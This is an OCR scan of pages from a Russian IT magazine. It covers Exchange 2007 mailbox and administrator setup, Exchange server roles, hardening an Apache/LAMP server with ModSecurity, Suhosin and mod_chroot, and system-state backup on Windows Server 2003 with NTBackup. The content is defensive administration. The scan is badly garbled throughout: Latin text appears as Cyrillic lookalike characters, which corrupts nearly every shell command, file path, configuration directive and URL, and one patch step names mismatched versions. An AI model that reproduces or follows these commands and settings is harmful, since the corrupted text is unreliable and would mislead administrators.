отправляющие соединители 5МТР, которые создаются во вкладке «Со- 
единители отправки». Запустив соответствующий мастер, необходимо 
указать удаленный 5МТР-узел и маршрут к нему. 

ДОБАВЛЕНИЕ АДМИНИСТРАТОРОВ И ПОЛЬЗОВАТЕЛЕЙ 

После установки будут созданы три группы администраторов ЕхсЬап§е 
со своими ролями, предназначенными для выполнения определен- 
ных операций. Это «Администратор организации», «Администратор 
получателей» и «Администратор ЕхсЬап§е с правами на просмотр». 
Чтобы добавить новую роль или изменить разрешение, следует вы- 
брать «Конфигурацию организации», затем в правом окне «Действия» 
нажать «Добавить администратора». В появившемся окне указываем 
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пользователя (или группу), который будет добавлен в качестве админи- 
стратора, его роль и подчиненный сервер. Удалить любую группу можно 
в этой же вкладке. 

Во время установки ЕхсЬап§е будет создан почтовый ящик администра- 
тора, для остальных пользователей ящик необходимо создать самосто- 
ятельно. Для этого переходим во вкладку «Настройка получателей», по- 
явится мастер создания почтового ящика. На первом шаге необходимо 
определить тип почтового ящика, в нашем случае это «Почтовый ящик 
пользователя». Затем выбираем тип пользователя. Здесь возможны два 
варианта. Если пользователь уже зарегистрирован в АД то выбираем 
«Существующий пользователь» и указываем его в следующем окне. Ина- 
че отмечаем «Новый пользователь» и в окне «Сведения о пользователе» 
вводим всю необходимую информацию: подразделение, имя для входа, 
пароль и прочее. Опционально можно сделать так, чтобы при первой 
регистрации пользователь сменил пароль. Указанный пароль должен 
удовлетворять требованиям политик, иначе создание почтового ящика 
завершится с ошибкой. Просмотреть политики можно в «Политика 
безопасности домена -> Параметры безопасности -> Политики учетных 
записей -> Политика паролей». Теперь переходим к шагу «Параметры 
почтового ящика», где вводим псевдоним, выбираем сервер ЕхсЬап§е, 
группу хранения по умолчанию, базу данных и политики почтовых ящи- 
ков. Далее читаем сводку параметров, если все устраивает, нажимаем 
«Создать». В сводке также можно просмотреть команду среды управле- 
ния Ехсйап^е, которая была использована при создании почтового ящи- 
ка. Удалить почтовый ящик еще проще : отмечаем его в окне «Настройка 
получателей» и нажимаем кнопку «Удалить» в окне «Действия». 

Дважды щелкнув по любой учетной записи, можно просмотреть и отре- 
дактировать ее свойства. Большинство вкладок повторяют параметры, 
введенные при создании почтового ящика, но есть и другие. Например, 
во вкладке «Функции почтового ящика» можно активировать или отклю- 
чить ОтІоокѴѴеЪ Ассезз, ЕхсЬап§е АсгіѵеЗупс, единую систему обмена 
сообщениями (требует корпоративной лицензии), МАРІ. Во вкладке 
«Параметры потока почты» задаются параметры доставки (пересылка и 
делегирование разрешений), ограничения размера сообщений, ограни- 
чения доставки сообщений. Последнее свойство позволяет указать, кому 
разрешено, а кому запрещено отправлять сообщения получателю. Если 
пользователь имеет несколько адресов, их заносят в «Адреса электрон- 
ной почты», основной адрес будет выделен жирным шрифтом. Выбрав 
пункт «Квоты хранилища» во вкладке «Параметры почтового ящика», 
для текущего пользователя можно установить персональные настройки 
для разных состояний почтового ящика (предупреждение и запрет на 
отправку/получение) и время хранения удаленных элементов. 



Мы затронули лишь часть настроек ЕхсЬап^е. К сожалению, все возмож- 
ности в рамках одной статьи описать невозможно. Но на сайте МісгозоЛ 
имеется достаточно документации по любому вопросу. Кроме того, в 
комплекте идет подробная справка, переведенная на русский язык. Из 
русскоязычных ресурсов я бы порекомендовал сайт ѵуѵѵѵѵ.тзехсЬап^е.ги . 
Успехов. НЕ 




Роли сервера 
ЕхсЬап§е 2007 



В ранних версиях ЕхсЬап§е включал две серверные роли: внешние 
серверы обслуживали соединения с клиентами, а на внутренних 
серверах располагались почтовые ящики. В ЕхсЬап§е 2007 админист- 
ратору для выбора доступно уже 5 ролей: 

1 . Клиентский доступ (СИепИ Ассезз Зегѵег, СА5) — аналог внешнего 
сервера ЕхсЬап§е 2003, сервер выступает посредником для клиент- 
ских соединений и предоставляет службу ОѴѴА. 

2. Сервер-концентратор (НиЪ ТгапзроП) — выполняет обработку все- 
го внутреннего потока почты, применяет политику маршрутизации 
сообщений и обеспечивает их доставку в почтовые ящики. 

3. Сервер почтовых ящиков — главный узел, на котором размещены 
базы данных общих папок и почтовых ящиков; здесь также создается 
автономная адресная книга. Часто роли сервера почтовых ящиков и 
САЗ объединяют. 

4. Сервер единой системы обмена сообщениями (ЦпШесІ Мезза^іп^) 

— занимается обменом голосовыми сообщениями, передачей факсов 
и электронной почты. 

5. Пограничный транспортный сервер (Еб§е ТгапзроП:) — размеща- 
ется в демилитаризованной зоне (ЛМ2) в качестве промежуточного 
узла и ЗМТР-ретранслятора; его задача — обработка всего потока 
почты и защита от спама/вирусов. Такие серверы не обязательно 
должны быть частью АЛ. 

На одном компьютере можно развернуть несколько серверных ролей 
(кроме Еб§е Тгапзроп) . Администрирование ролей выполняется 
отдельно, смену ролей можно производить динамически без переуста- 
новки ЕхсЬап^е. Если серверные роли будут развернуты на нескольких 
компьютерах, устанавливать их нужно в порядке, указанном выше. 
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Возьми ИНДЕЙЦА 
ПОД ЗАЩИТУ 

ОБЕСПЕЧИВАЕМ БЕЗОПАСНОСТЬ ИНФРАСТРУКТУРЫ ВЕБ-СЕРВЕРА 



По последним данным британской компании ЫеісгаН, самым популярным веб-сервером в интернете явля- 
ется Арасйе - его доля на рынке за последние 3 года постепенно увеличивалась и сегодня составляет 67%. 
Успех АрасЬе объясняется стабильностью его работы, наличием хорошей репутации в плане безопасности 
и простотой в администрировании. Но нельзя забывать, что обычно АрасЬе используется не один, а в связ- 
ке ЬАМР - Ьіпііх, АрасЬе, МуЗС^Ь и РНР/РегІ. Поэтому сегодня мы выясним, как можно повысить безопас- 
ность ЬАМР с помощью МобЗесигПу, ЗиЬозіп, модуля тос1_сЬгооГ и встроенных средств индейца. 



НАСТРАИВАЕМ АРАСНЕ 

Несмотря на репутацию компонентов ЬАМР, сегодня только и слышно 
о РНР іпсіисіе, 3(^Ь йуесйоп, Сгозз зіге зсгірГіпд (Х55) и других атаках, на- 
правленных на веб-сервисы. Согласно статистике ѴѴеЪ АррИсаГіоп ЗесигіГу 
Сопзоггіит Гѵѵѵѵѵу.\ѵеЬарр5ес.ог^/ргоіес1:5/\ѵЫсі/5І:а1:І5І:іс5.5Ьі:т1~) . именно 
они занимают первые места по количеству зафиксированных инциден- 
тов. Среди основных причин такой негативной тенденции называют 
широкую доступность инструментов, необходимых для проведения атаки, 
и недостаточное внимание со стороны разработчиков сайтов к вопросам 
безопасности. Условно можно выделить 2 фактора, снижающих безопас- 
ность: ошибки в администрировании и ошибки в программировании 
веб-ресурса. С ними и будем разбираться. Советы и рекомендации даны 
применительно к ІіЬипШ/ВеЬіап. Подправив расположение файлов, их 
можно использовать и в любом другом дистрибутиве. По умолчанию 
веб-сервер не скрывает название операционной системы, свою версию и 
информацию о некоторых установленных модулях. Все это злоумышлен- 
ник может использовать при подготовке атаки. Чтобы сделать индейца 
менее болтливым, в конфигурационный файл арас1іе2.соп1 (в некоторых 
дистрибутивах Ытрсі.сопі) необходимо добавить следующие строки: 

ЗегѵегЗідпаЬиге ОЬЬ 

ЗегѵегТокепз Ргоб. 

Директива ЗегѵегЗі^паГиге отвечает за вывод информации внизу страни- 
цы, например страницы ошибки 404 или листинга файлов каталога. Что 



именно выводится, определяет ЗегѵегТокепз, значение которой по умолча- 
нию Риіі. При установке в Ргос1[исЮп1у] будет выведено название сервера 
АрасЬе без номера версии, без информации о модулях и версии операци- 
онной системы. Как вариант — можно сразу залезть в исходники (файл 
ЫтрсЬЬ в АрасЬе 1.3 и ар_ге1еазе.1і в 2.x) и перед компиляцией подправить 
информацию по своему усмотрению. В некоторых статьях рекомендуют 
запускать веб-сервер под отдельной учетной записью, приводя в качестве 
примера поЬобу. Запуск нескольких различных серверов под этим поль- 
зователем делает его не менее могущественным, чем гоог, поэтому для 
запуска любого сервера следует использовать отдельную учетную запись. 
Например, в ЫЬипШ и некоторых дистрибутивах это ѵцлдѵ-сіага: 

$ зисіо дгер ІІзег /еЬс/арас!іе2/арас]іе2 .сопЬ 
ІІзег ѵтѵ^7-(1аЬа 

Создаем пользователя, от имени которого будет запускаться и работать 
веб-сервер: 

$ зшЗо асИизег --по-сгеаЬе-Іюте --(ЗізаЫесІ-раззѵгогсІ \ 
--сІізаЫесі-Іодіп шты - сіаііа 

Затем в конфигурационном файле указываем: 

ІІзег м\л7Ѵ7-сІаСа 
Огоир ѵтѵ7Ѵ7-(іаІ:а 
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Теперь устанавливаем необходимые права: 

$ зисіо сЬоѵт -К гоок:гоо!: /екс/арасЬе2 
$ зисіо /екс/арасЬе2 -куре (5 I хагдз сЪтосі 755 
$ зисіо /екс/арасЬе2 -куре к I хагдз сЪтосі 644 

Аналогичные команды выполняем для каталогов /ѵаг/1о§/арасЪе2 (здесь 
хранятся журналы) и /ѵаг/\ѵѵ\п/ѵ (соответствует НосшпешКооі: в ЦЬипШ) . 
Нет никаких препятствий для того, чтобы убрать и право на чтение конфи- 
гурационных файлов АрасЬе: 

$ зисіо сЪтосі -К до-г /екс/арасЪе2 

По умолчанию индеец загружает довольно большое количество модулей. 
Чтобы просмотреть те, что скомпилированы вместе с АрасЬе, используй 
арасЪе2сі:1-1 или арасЪе2 -1. К сожалению, лишнее из полученного списка 
убирается только путем полной пересборки индейца. Все динамически 
загружаемые модули (Эупатіс 5Ъагес1 ОЪдесО можно просмотреть, введя: 

$ зисіо дгер — К ЬоасІМосіиІе /екс/арасЪе2/* 

Внимательно изучаем полученный список и в конфиге комментируем то, что 
не нужно. Вот список модулей, которые можно безболезненно отключить, 
естественно, убедившись, что они действительно нами не используются: 
тос1_ітар, тосІ_аіП:отс1ех, тос!_іпс1ис1е, тосНпіо, тосІ_и5егс1іг, тосі_5І:аШ5. 
АрасЬе поддерживает два типа аутентификации: Ьазіс и сИ^езІ: (обеспечи- 
вается модулем тосі_аи1:Ь_сіі§е5І:) . В первом случае пароль передается в от- 
крытом виде. При использовании этого типа аутентификации у злоумыш- 
ленника есть возможность перехватить логин и пароль и получить доступ 
ко всей «охраняемой» области. В сіі^езі: передается Кезропзе, который пред- 
ставляет собой контрольную (обычно 1ѴГО5) сумму от комбинации логина, 
пароля, запрашиваемого ИВЪ, метода НТТР и строки попсе, генерируемой 
сервером при ответе. Строка попсе позволяет сделать эту строку поистине 
уникальной. Для включения сЬ^езИ-аутентификации используем: 

АикЪТуре Бідезк 

Одной из особенностей АрасЬе является использование типового доступа, 
когда многие параметры либо устанавливаются по умолчанию, либо 
наследуются от родительского каталога. Чтобы избежать неприятностей, 
следует принудительно ограничить выполнение ССІ-скриптов, 551 (5егѵег 
5ісІе Іпсіисіез) включений, индексирования каталога и следование симво- 
лическим ссылкам. Для этого в описании ресурса необходимо деактивиро- 
вать следующие директивы: 

Оркіопз АН -Іпсіехез -Іпсіисіез — ЕхесССІ -РоІІомЗутЬіпкз 

Либо отключить все сразу: 




Оркіопз Ыопе 

Чтобы злоумышленник не смог прочитать временные или конфигураци- 
онные файлы, используй следующую конструкцию: 

<Рі1ез « ( л \ .Ък | ~$ | \ .Ъак$ | \ .ВАК$) "> 

Огсіег АІІ о™, Бепу 
Бепу к гот аіі 
</Рі1ез> 

Не всегда веб-сервер или отдельный ресурс должны быть видны из сети. 
Например, используется прокси, либо это внутренний сервер компании. 
Если нет возможности закрыть доступ брандмауэром или использовать 
отдельный интерфейс, тогда доступ к ресурсу следует ограничить на осно- 
вании ІР-адреса или диапазона ІР-адресов: 

Огсіег Бепу, АІ Іо™ 

Бепу к г от аіі 

АН о™ Нот 192 .168.0 .0/24 

Несмотря на то что директива Загізку имеет всего два параметра — АІІ и 
Алу, она предоставляет возможность более гибко контролировать доступ 
к ресурсу. Например, нам нужно, чтобы доступ к приватной папочке могли 
получить только зарегистрированные пользователи и только с указанных 
адресов. Как это сделать? Очень просто: 

Огсіег Бепу, АН о™ 

Бепу к г от аіі 
Кедиіге ѵаіісі-изег 
АНои Нот 192 .168.0. 0/24 
Закізку АН 

А для того чтобы пользователи внутренней сети могли вообще не регист- 
рироваться, ставим вместо АН Алу. 

Если изменить значения некоторых параметров, можно смягчить эффект 
Оо5-атаки. Например, ТітеоШ: определяет, в течение какого времени 
сервер будет ожидать ответа клиента. В более ранних версиях АрасЬе 
значение этой директивы равнялось 1200 секундам, затем оно было 
уменьшено до 300 сек. Мы можем спокойно его урезать, например, до 
60 сек (это отразится только на пользователях с плохим соединением) : 

Тітеоик 60 

По умолчанию размер клиентского запроса неограничен. Это обстоятельство 
также может быть использовано д ля организации Оо5-атаки. Администратор 
в силах принудительно указать размер запроса в пределах от 0 (неограничен) 
до 2 147 483 647 байт (2 Гб) какдля всего сервера, таки для отдельных ресурсов. 
Например, чтобы ограничить размер запроса 100 килобайтами, пишем: 
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ЫтіЬЕедиезкВобу 102400 

Если клиент загружает на сервер некоторые данные (например, содер- 
жимое заполненных форм) , то этот параметр следует скорректировать . 

Для противодействия атакам «Отказ в обслуживании» существу- 
ет целый ряд директив: ЬітііКециезіРіеІсіз, ЬітпКедиезІіРіеЫЗіге 
и ЬітПКециезіЬіпе, МахКедиезІізРегСЫІсІ, МахСІіеШз и некоторые 
другие. При необходимости, возможно, их значения стоит пересмот- 
реть, выставив оптимальные для конкретных условий. Как вариант 
— для борьбы с БоЗ-атаками можно применять специальный модуль 
тосі_еѵа§іѵе (\ѵѵѵѵѵ.2(І2Іагзкі.сот/рго)есі:5/то<1_еѵазіѵе) . 

УСТАНАВЛИВАЕМ М005ЕСІЖІТѴ 

Значительно повысить защищенность веб-ресурса можно с помощью 
МобЗесигПу. Этот проект, созданный Иваном Ристиком в 2003 году, 
позволяет защищать веб-приложения как от известных, так и от еще не- 
известных атак. МобЗесигПу работает в виде модуля веб-сервера АрасЬе, 
либо в автономном режиме. Его использование прозрачно, установка и 
удаление не требуют изменения настройки сервисов и сетевой топологии. 
Кроме того, при обнаружении уязвимого места теперь нет необходимости 
править исходные коды, создавая новые ошибки, — достаточно добавить 
правило, запрещающее вредоносную комбинацию. 

В репозитарии некоторых дистрибутивов уже включен нужный пакет, 
следует поискать что-то вроде тоб-зесигііу. В ЭеЬіап достаточно добавить 
в /епс/ари/зоигсез Лізі: новый репозитарий: 

беЪ Ъккр : //еЬс . іпіЫ:аЪ.огд/~аді/беЪіап/1іЪарас1іе-тоб- 
зесигіЪу2/ еЬсЪ/ 

И затем можно инсталлировать: 

# арС-деЬ ирбаСе 

# арС-деЬ іпзкаіі 1іЬарас1іе2-тоб-зесигі1:у2 

Установить МобЗесигйу из исходных текстов тоже просто. Для сборки 
необходимы заголовочные файлы Арасйе, поэтому забираем исходные 
тексты веб-сервера из репозитария или с сайта проекта: 

$ зибо арЪ-деЬ арасЪе2-згс 1іЪхт12-беѵ 

Если используются исходные тексты, взятые с сайта проекта, то перед 
компиляцией тоб_зесигіІу следует сконфигурировать веб-сервер коман- 
дой ./сопіі^иге с нужными параметрами (для работы модуля понадобит- 
ся ‘--епаМе-итцие-кГ), а затем выполнить следующие действия: 

$ мдек — с ѵтѵ^.тобзесигіііу . огд/боѵтІоаб/тобзесигіСу- 
арас1іе_2 .1.1. Саг . дт 

$ Саг хгѵС тосізесигіСу-арас1іе_2 .1.1. Саг . дт, 

$ об тосізесигіСу-арас1іе_2 . 1 . 1/арас1іе2 



Теперь редактируем МакеШе: 

$ тсебіС МакеШе 

# Меняем архз на архз2 (АРаске еХСепЗіоп Сооі) 

АРХЗ = архз 2 

# Каталог с исходными текстами АрасЬе 
Сор_біг = /Ьоте/дгіпбег/зоигсе/ЬССрсІ-2 . 2 . 4 

Компилируем модуль, останавливаем АрасЬе, устанавливаем модуль: 

$ таке 

$ зибо /еСс/іпіС . б/арас!іе2 зСор 
$ зибо таке іпзСаІІ 

В конфигурационный файл веб-сервера добавляем две строчки: 

ЬоабРіІе /изг/1іЬ/1іЬхт12 . зо 

ЬоабМобиІе зесигіСу2_тоби1е /изг/1іЬ/тоби1ез/тоб_ 
зесигіСу2 . зо 

Для удобства все настройки шоб_5есигіІу лучше вынести в отдельный 
файл, взяв за пример готовый шаблон и подключив его в арасЬе2.соп1 
директивой: 

Іпсіибе /еСс/арас1іе2 /тоб_зесигіСу . сопС 

Копируем шаблон и правим: 

$ зибо ср тобзесигіСу-арас1іе_2 . 1 . 1/тобзесигіСу . сопС- 
тіпітаі /еСс/арас1іе2 /тоб_зесигіСу . сопС 

$ зибо тсебіС /еСс/арас1іе2/тоб_зесигіСу .сопС 
сіШобиІе тоб_зесигіСу2 . о 
ЗесКиІеЕпдіпе Оп 

ЗесРіІСегБеСаиІСАсСіоп "бепу , Іод, зСаСиз : 430 " 
</1СМоби1е> 

Активируем модуль тоб_ипідие_іб: 

$ зибо а2ептоб ипідие_іб 
Теперь можно запускать АрасЬе: 

$ зибо /еСс/іпіС . б/ арас1іе2 зСагС 

Если все работает нормально, можно добавлять правила. Команда разработ- 
чиков уделяет большое внимание усовершенствованию кода тоб_5есигііу, 
оставляя создание правил на откуп пользователю, поэтому оригинальный 
конфигурационный файл имеет всего несколько рулесетов, находящихся в под- 
каталоге гиіез. На сайте проекта лежит отдельный архив тобзесигку-соге-гиіез. 
Для подключения входящих в его состав правил достаточно скопировать все 
сопТфайлы в каталог /еЩ/арас1іе2 и в секции тоб_5ешгку2. с указать : 

Іпсіибе гиіез/* . соп:Е 
Іпсіибе гиІез/Ыоскіпд/ * . сопі 

Подключать все сразу не стоит. Некоторые правила требуют редактирова- 
ния под конкретные условия, лучше разбираться постепенно. 

ЗАЩИЩАЕМ РНР С ПОМОЩЬЮ 51Ж05Ш 

Задача проекта Зийозіп (мплпл^Ьагбепеб-рЬр.пеЕ/зиЬозт) — защита сер- 
веров и пользователей от целого ряда известных проблем в приложениях 
и ядре РНР, так как 5а1е_то<Зе помогает далеко не всегда. Сам ЗиЬозіп 
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Проверяем правильностьзакачки 



состоит из двух независимых частей, которые могут использоваться 
как раздельно, так и совместно. Первая часть — небольшой патч кядру, 
осуществляющий низкоуровневую защиту структур данных от перепол- 
нения буфера, уязвимости форматной строки и ошибок в реализации 
функции геаіраііі, присущей некоторым платформам, а также от других 
потенциальных уязвимостей ядра РНР. Вторая часть реализована в виде 
расширения, которое фактически и осуществляет всю основную защиту, 
при необходимости его очень просто доустановить в уже рабочую 
систему без полной пересборки РНР. С полным списком возможностей 
можно познакомиться на сайте проекта \ѵѵ\дѵ.1іагс1епес1-р1ір.пеі:/5и1і05Іп/ 
а Іеатге НзЕ.ІШпІ . 

В случае нарушения установленных правил возможна блокировка пере- 
менных, отсылка определенного НТТР-кода ответа, перенаправление 
браузера пользователя, выполнение другого РНР-скрипта. Все события 
заносятся в журналы, для чего может использоваться зу5Іо§, свой модуль 
или внешний скрипт. Последние версии расширения ЗиЬозіп совместимы 
практически со всеми версиями РНР. 

Установка ЗиЬозіп включает в себя 2 этапа: наложение патча на РНР с 
последующей его пересборкой и компиляция модуля расширения. Хотя 
возможна и сборка со встроенным расширением. Чтобы не было проблем 
с зависимостями, в ІЛшпт перед началом установки рекомендую дать 
команду Бибо арі-^е* ЬиіЫ-сіер рйр5 . 

Скачиваем РНР, затем патч зиЬозіп под используемую версию РНР и модуль 
расширения. Все это распаковываем, накладываем патч и компилируем: 

$ каг хѵ^ к рЪр-5 .2.3. каг .Ът.2 

$ дипгір зиЬозіп-раксІі-5 . 2 . 3-0 . 9 . 6 . 2 .раксЬ.дг 
$ ей рЪр-5 .2.3 

$ раксЬ -р 1 -і . . /зиЬозіп-раксІі-5 . 1 . 6-0 .9.5 . раксЪ. 

$ . /сопкідиге [--епаЫе-зо и другие параметры при необ- 
ходимости] 

$ таке 
$ таке кезк 
$ зисіо таке іпзкаіі 

Теперь собираем модуль расширения: 

$ каг Х2ѴІ: зиЬ.озіп-0 .9.20. кд 2 
$ ей зиЬозіп-0 . 9 . 20 
$ рііріге 

$ . /сопкідиге --ргекіх=/изг/1іЪ/р1ір5/200б0б13 + 1кз/ 

$ таке 
$ таке кезк 
$ зисіо таке іпзкаіі 

Проверить сборку можно, введя команду: 



$ рЪр — ѵ 

РНР 5.2.3 ѵ7ІкЬ ЗиЬозіп-РаксЪ. 0 . 9 . б . 2 (сіі) (Ъиіік: Ліі 
26 2007 11:35:13) 

Все настройки Зикозіп производятся в файле рЬр.іпі. Патч поддержи- 
вает только опции регистрации, поэтому первой записью обязательно 
подключаем модуль зиіюзіп.зо (он должен быть виден переменной 
ЬО_КШ_РАТН): 

ехкепзіоп=зи1іозіп . зо 

После установки ЗиЬозіп будет работать с настройками по умолчанию, 
которые достаточны, но, возможно, не оптимальны для твоей 
конфигурации . 

СТРОИМ СНРООТ 

Для построения сЬгооГ-окружения нам понадобится модуль тоб_сЬгоо 1 : 
(соге.5е§1аик.р1/~1юЬЬіІ:/то(1_с1ігооО . В репозитарии ІЛшпт он присут- 
ствует: 

$ зисіо арк-дек іпзкаіі 1іЬарасЬе2-тосЗ-с1ігоок 

Параллельно будет установлен пакет тоб-скгооГ-соттоп, содержащий 
документацию (/изг/зкаге/бос/тоб-скгооГ-сопшіоп) . Для самостоя- 
тельной сборки тос1_с1ігооі: достаточно распаковать свежескачанный 
архив и ввести команду архз2 -сіа ішх1_скгоокс. Далее следует указать, 
что рабочий каталог теперь является корневым, то есть в араске2.сопк 
прописываем: 

сІкМосіиІе тосЗ._сЬ.гоок . о 

ЬоасіРіІе /1іЬ/1іЬдсс_з . зо . 1 
РісІРіІе /ѵаг/гип/ііккрсі.рісі 
СкгоокБіг /ѵаг/ѵтѵм 
БосшпепкКоок / 

</ІкМосіи1е> 

Значение БоситетКооН изменяем с «/ѵаг/тѵѵѵ» на «/» и все ссылки на 
ресурсы даем относительно корня. В араске2.сопкне забываем подклю- 
чить модуль: 

ЬоасіМосіиІе с!ігоок_тосіи1е /изг/1іЪ/араске2/тосіи1ез/то(і_ 
скгоок . зо 

Либо в ІЛшпт правильнее: 

$ зисіо а2ептосі тосЦзЬгоок 

При использовании Араске2 понадобится создать каталог для РГО-файла. 

$ зисіо тксііг -р /ѵаг/ѵт^м/ѵаг/гип 

$ зисіо сЬоѵт -К. гоок:гоок /ѵаг/\лтѵтѵ^/ѵаг/гип 

$ зисіо 1п -з /ѵаг/мѵлѵ/ѵаг/гип/ЬккрсІ.рісІ /ѵаг/гип/кккрсі. 

ріеі 

Перезапускаем индейца и проверяем работу. 

Это далеко не все, что можно сделать для защиты ЬАМР. Также следует 
учесть, что приведенные советы не могут гарантировать абсолютной 
безопасности (такого просто не бывает в природе) хотя несколько 
уменьшить риск они позволяют. Кроме того, в некоторых средах часть 
параметров может вызывать проблемы или влиять на производитель- 
ность. Поэтому к их использованию следует подходить осторожно, вводя 
изменения постепенно и тщательно тестируя результат. Универсальный 
совет по-прежнему один: следует изучать документацию и включать 
только то, что нужно. ШИ 
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ВОССТАНОВЛЕНИЕ ѴѴІИ00ѴѴ5 5ЕВѴЕК 2003 ПОСЛЕ ТЯЖЕЛЫХ РАНЕНИЙ 

ѴѴіпсіо\ѵ5 Зегѵег 2003 — достаточно надежная и неприхотливая система, средняя наработка на отказ 
которой составляет несколько лет. Для борьбы с падениями народ вовсю использует ІМогГоп СйобГ, Асгопіз 
ТшеІта§е и другие платные утилиты, плохо работающие (или совсем неработающие) с 5С5І-дисками/ 
КАШ-массивами, а о штатном М5> Васкир никто и слушать не хочет — все сразу начинают махать руками 
и гнать волну. Плох же тот мастер, кто не знает свой инструмент! Мыщъх использует МЕ> Васкир уже более 
семи лет и со всей ответственностью заявляет, что это отличное средство восстановления системы, обла- 
дающее огромным скрытым потенциалом, о котором мы сейчас и расскажем. 



очему падает ѴѴіп2кЗ? Причины на самом деле различны, 
и если попытаться огласить весь список, то получится 
здоровенный талмуд, поэтому перечислим лишь наиболее 
значимые из них: 

•уст ановка «кривого» программного обеспечения (пакетов обновлений, 
прикладных приложений, драйверов и т.д.), вызывающая конфликты раз- 
ной степени тяжести и/или ведущая к разрушению критически важных 
структур данных; 

• сбои питания и/или дефекты оборудования, нарушающие целостность 
системного кода/данных; 



• вирусные эпидемии и хакерские атаки, завершающиеся внедре- 
нием нестабильно работающего руткита; 

• ошибки оператора, удалившего жизненно важные системные файлы, 
отключившего базовые службы или сделавшего другую глупость. 

Также приходится сталкиваться с физическими отказами жесткого диска, 
контроллера КАГО-массива, разрушением главной загрузочной записи, 
ЬооЕ-сектора и другими катастрофами планетарного масштаба, требую- 
щими для восстановления данных не только соответствующих навыков, 
но и (в ряде случаев) весьма дорогостоящего оборудования. 

К счастью, такие происшествия случаются нечасто. В наших рассуждениях 
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Планировщикзаданий, встроенный в М5 Васкир 
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лавное окно программы с кнопками различных мастеров 




мы будем исходить из того, что жесткий диск (КАГО-массив) на аппа- 
ратном уровне функционирует исправно, файловая система цела (или 
может быть вылечена штатной утилитой сЪкбзк) , а пострадала лишь сама 
операционная система, причем тяжесть разрушений колеблется от неста- 
бильной работы до полного отказа загружаться. Более сложные случаи 
восстановления мы не рассматриваем, отсылая читателя к серии статей 
«Восстановление данных на ШТ5 -разделах» и к книгам «Техника восста- 
новления данных» (Бана гесоѵегу тірз апб зоітіопз), электронные копии 
которых лежат на мыщъх’ином сервере: Ьйр: //пегиті.ог^.ги/гесоѵег.гір. 
Ыі р : / /пегиті. ог^.ги /гесоѵег-іиіі-гиз . гір. ЬЩ) : / /пегиті.огу . ги /гесоѵег-іиіі- 
епе.гір . Они, естественно, совершенно бесплатны. 

Хочется еще раз напомнить читателю, что залогом сохранности данных 
была и остается резервная копия, о технике создания которой мы и будем 
говорить. При нынешних ценах на сменные носители отсутствие резервной 
копии может объясняться лишь полной безответственностью системного 
администратора или неумением автоматизировать процесс резервиро- 
вания. Но объяснение — это еще не оправдание ! Приговором (в случае 
разрушения) становится кропотливая работа по ручному восстановле- 
нию «осколков» данных, когда файлы приходится собирать буквально по 
кусочкам. И стоит эта работа намного больше носителей для резервного 
копирования. Добавь сюда простой организации на время восстановления, 
и ты поймешь, почему в этой статье мы будем говорить только об утилите 
М3 Васкир, оставив остальные способы восстановления за кадром. 

СОЗДАНИЕ РЕЗЕРВНОЙ КОПИИ 

Набираем в командной строке шЬаскир.ехе (именно Ш, а не тз) и дожида- 
емся запуска. Поклонники графических сред и мыши могут пойти другим 
путем: «Му СотриГег -> Алу Бізк 4 Ргореггіез Тооіз Васкир Г\Іо\ѵ». 

Сразу пропускаем главное окно приложения с большими прямоугольными 
кнопками, вызывающими различных мастеров (по кіббіп§!), и переходим 
непосредственно к вкладке Васкир. 

Здесь отмечаем галочкой пункт Зузіет Згаге («Состояние системы»), фор- 
сирующий архивирование следующих компонентов (перечисленных в ко- 
лонке справа) : загрузочные файлы, реестр и классы СОМ + . К сожалению, 
мы не можем влиять на выбор компонентов, что есть большая вселенская 
несправедливость, поскольку в подавляющем большинстве случаев систе- 
ма выходит из строя из-за разрушения реестра или классов. 

Указываем путь к файлу архива в строке «Васкир тебіа о^ Ше пате» и 
нажимаем ЗнагТ Васкир, после чего у нас запросят описание/метку архива 
(Ъаскир безсгірйоп/ІаЪеІ) и способ его создания: аррепб (дозапись в 
конец) или геріасе (замещение старых данных). Исходя из своего личного 
опыта, мыщъх рекомендует не класть все яйца в одну корзину, то есть 
всегда создавать архивный файл заново, отказавшись от идеи дозаписи в 
его конец, поскольку это чревато целым рядом различных проблем. 

Нажав кнопу Абѵапсеб («Дополнительные опции»), мы можем выбрать 
тип архива: погтаі (полная архивация со снятием атрибута «Архи- 



вный»), сору (полная архивация без снятия атрибута «Архивный»), 
іпсгететаі (архивирование только измененных или вновь созданных 
файлов), бШегепгіаІ (то же самое, что іпсгететаі, только без снятия 
атрибута «Архивный»), баііу (архивирование файлов, измененных в 
течение дня) . Последние три типа для восстановления требуют архивы 
погтаі/сору и всю цепочку іпсгететаІ/бШегетіаІ/баіІу, что часто 
приводит к путанице и снижает вероятность успешного восстановле- 
ния, особенно если хотя бы один из архивов поврежден, так что мыщъх 
рекомендует всегда выбирать тип погтаі, несмотря на то что он требует 
больше времени, чем последние три. 

Галочка «Ѵегііу баіа аітег Ъаскир» («Проверка целостности данных после 
архивирования») при резервировании на жесткий диск бессмысленна, и 
поэтому ее лучше не взводить, а вот «Ашотагісаііу Ъаскир Бузует Ргоіесіеб 
Рііез ѵѵкЪ гііе Зузііет Згаге» («Автоматически архивировать защищенные 
системные файлы вместе с состоянием системы») лучше оставить взведен- 
ной по умолчанию. 

Наконец, после нажатия на кнопку 8іаг* Васкир начинается процесс 
архивации, занимающий (в зависимости от быстродействия системы) 
от нескольких минут до получаса. На выходе мы получаем ЪкР-файл 
размером порядка 400 Мб; точный размер зависит от версии системы, 
количества установленных заплаток, драйверов и приложений, но в 
своей практике мыщъх еще не сталкивался с тем, чтобы Ъкі-файл (типа 
геріасе) не влезал на один диск СБ-Я/КѴѴ, не говоря уже о ПѴЛ-К/КѴѴ. 
Хранить на жестком диске архив небезопасно. Впрочем, как показыва- 
ет практика, оптические носители сыпятся еще чаще, так что несколько 
копий никому не помешает. 

ОК, мы имеем архив состояния системы, и, если вдруг ѴѴіп2кЗ начнет 
вести себя нестабильно, мы всегда сможем выполнить откат. Приложе- 
ния и драйверы, установленные после создания архива, в большинс- 
тве случаев отката не переживут (это зависит от того, в какие ключи 
реестра они себя прописывают) и потребуют переустановки. Поэтому 
вырабатываем следующую стратегию поведения. Создаем архив систе- 
мы. Устанавливаем новое приложение/драйвер/заплатку. Тестируем 
сервер в течение некоторого времени (например, недели). Если полет 
нормальный, создаем новый архив системы, а старый удаляем. Если же 
после установки приложения/драйвера/заплатки появляются глюки, 
которые не устраняются деинсталлятором, выполняем принуди- 
тельный откат через М5 Васкир. Эта бесхитростная схема позволила 
мыщъх’у продержать пару серверов и пяток рабочих станций более 
семи лет без переустановки системы. 

ПРОСТЫЕ СЛУЧАИ ВОССТАНОВЛЕНИЯ 

